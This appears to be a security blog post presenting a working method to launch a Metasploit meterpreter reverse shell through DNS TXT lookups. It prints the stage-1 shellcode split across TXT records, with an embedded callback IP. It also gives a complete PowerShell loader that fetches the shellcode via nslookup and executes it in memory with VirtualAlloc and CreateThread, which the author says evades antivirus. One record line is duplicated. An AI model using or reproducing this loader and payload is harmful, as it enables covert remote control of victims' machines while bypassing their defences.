legal contact
 

Reverseshell from DNS lookups

Having done some other work, I came accross a fantastic way of getting a reverse shell setup from some innocent DNS lookups...

Great Thx to Nicolas Krassas

Follow my article on how to create your PS meterpreter shell...

Create below TXT DNS entrys with your created shellcode from my other page.

Finally it should look like below sample:

a.blabla.com.          IN TXT  "0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52"
b.blabla.com.          IN TXT  ",0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b"
c.blabla.com.          IN TXT  ",0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68"
d.blabla.com.          IN TXT  ",0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x6a,0x00,0x54,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x5f,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x68,0xfb,0x20,0x00,0x00,0x53,0x50,0x68,0x57,0x89,0x9f"
e.blabla.com.          IN TXT  ",0xc6,0xff,0xd5,0xeb,0x48,0x59,0x31,0xd2,0x52,0x68,0x00,0x32,0xa0,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x6a,0x10,0x5b,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86"
e.blabla.com.          IN TXT  ",0xc6,0xff,0xd5,0xeb,0x48,0x59,0x31,0xd2,0x52,0x68,0x00,0x32,0xa0,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x6a,0x10,0x5b,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86"
f.blabla.com.          IN TXT  ",0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1a,0x4b,0x74,0x10,0xeb,0xd5,0xeb,0x49,0xe8,0xb3,0xff,0xff,0xff,0x2f,0x5a,0x62,0x69,0x37,0x00,0x00,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00"
g.blabla.com.          IN TXT  ",0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x57,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3"
h.blabla.com.          IN TXT  ",0xe8,0x51,0xff,0xff,0xff,0x31,0x37,0x38,0x2e,0x33,0x32,0x2e,0x37,0x32,0x2e,0x31,0x39,0x34,0x00"

And run below PS script:

<#
Powershell for DNS based meterpreter payload 
This script will load in memory the first stage of metasploit meterpreter that exists in txt record .
The second stage will be transferred and executed in memory with 0 detection from the antivirus engines.
Author: Nicolas Krassas
Inspired by corelanc0d3r dns based shellcode and Matthew Graeber
#>
# Functions for creating a thread
$code = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@
 
function Convert-HexStringToByteArray {
################################################################
#.Synopsis
# Convert a string of hex data into a System.Byte[] array. An
# array is always returned, even if it contains only one byte.
#.Parameter String
# A string containing hex data in any of a variety of formats,
# including strings like the following, with or without extra
# tabs, spaces, quotes or other non-hex characters:
# 0x41,0x42,0x43,0x44
# \x41\x42\x43\x44
# 41-42-43-44
# 41424344
# The string can be piped into the function too.
# http://www.sans.org/windows-security/2010/02/11/powershell-byte-array-hex-convert
################################################################
[CmdletBinding()]
Param ( [Parameter(Mandatory = $True, ValueFromPipeline = $True)] [String] $String )
 
#Clean out whitespaces and any other non-hex crud.
$String = $String.ToLower() -replace '[^a-f0-9\\\,x\-\:]',''
 
#Try to put into canonical colon-delimited format.
$String = $String -replace '0x|\\x|\-|,',':'
 
 
#Remove beginning and ending colons, and other detritus.
$String = $String -replace '^:+|:+$|x|\\',''
 
#Maybe there's nothing left over to convert...
if ($String.Length -eq 0) { ,@() ; return } 
 
#Split string with or without colon delimiters.
if ($String.Length -eq 1)
{ ,@([System.Convert]::ToByte($String,16)) }
elseif (($String.Length % 2 -eq 0) -and ($String.IndexOf(":") -eq -1))
{ ,@($String -split '([a-f0-9]{2})' | foreach-object { if ($_) {[System.Convert]::ToByte($_,16)}}) }
elseif ($String.IndexOf(":") -ne -1)
{ ,@($String -split ':+' | foreach-object {[System.Convert]::ToByte($_,16)}) }
else
{ ,@() }
#The strange ",@(...)" syntax is needed to force the output into an
#array even if there is only one element in the output (or none).
}
 
function GetShellCode($hostname)
{
$result = iex "cmd.exe /c `"nslookup  -querytype=txt -timeout=5 $hostname 2> NUL`""
$shellarray = ""
foreach ($line in $result)
{
	$line=$line.trim()
	if ($line.contains("`""))
	{$shellarray = $line.split("`"")[1].trim()}
}
"$shellarray"
}
"Got the shellcode from txt records"
# My txt records you better not use them, or you may see me in your system :)
 
$shellpart1 = GetShellCode "a.blabla.com"
$shellpart2 = GetShellCode "b.blabla.com"
$shellpart3 = GetShellCode "c.blabla.com"
$shellpart4 = GetShellCode "d.blabla.com"
$shellpart5 = GetShellCode "e.blabla.com"
$shellpart6 = GetShellCode "f.blabla.com"
$shellpart7 = GetShellCode "g.blabla.com"
$shellpart8 = GetShellCode "h.blabla.com"
 
$myshell = " $shellpart1$shellpart2$shellpart3$shellpart4$shellpart5$shellpart6$shellpart7$shellpart8 "
 
# Thread control
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
 
# msf meterpreter stage 1, this one must be converted to proper byte array first.
[Byte[]]$sc =   Convert-HexStringToByteArray($myshell) 
 
# Calculate correct size param for VirtualAlloc
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
 
# Allocate memory 
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
 
# build it in memory
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
Try {
$winFunc::CreateThread(0,0,$x,0,0,0)
sleep 100000
}
Catch
{
[system.exception]
"caught a system exception"
}

Now, once calling this script, the PS will lookup the DNS records, craft the meterpreter from the answers and run the meterpreter shell towards your predefined multihandler host.

And all will be done in Memory. - Cool, isn't it?

Credits

URL
https://www.fishnetsecurity.com/6labs/blog/bypassing-antivirus-powershell
https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1
http://0entropy.blogspot.co.uk/2012/04/powershell-metasploit-meterpreter-and.html
http://security.stackexchange.com/questions/44345/techniques-for-anti-virus-evasion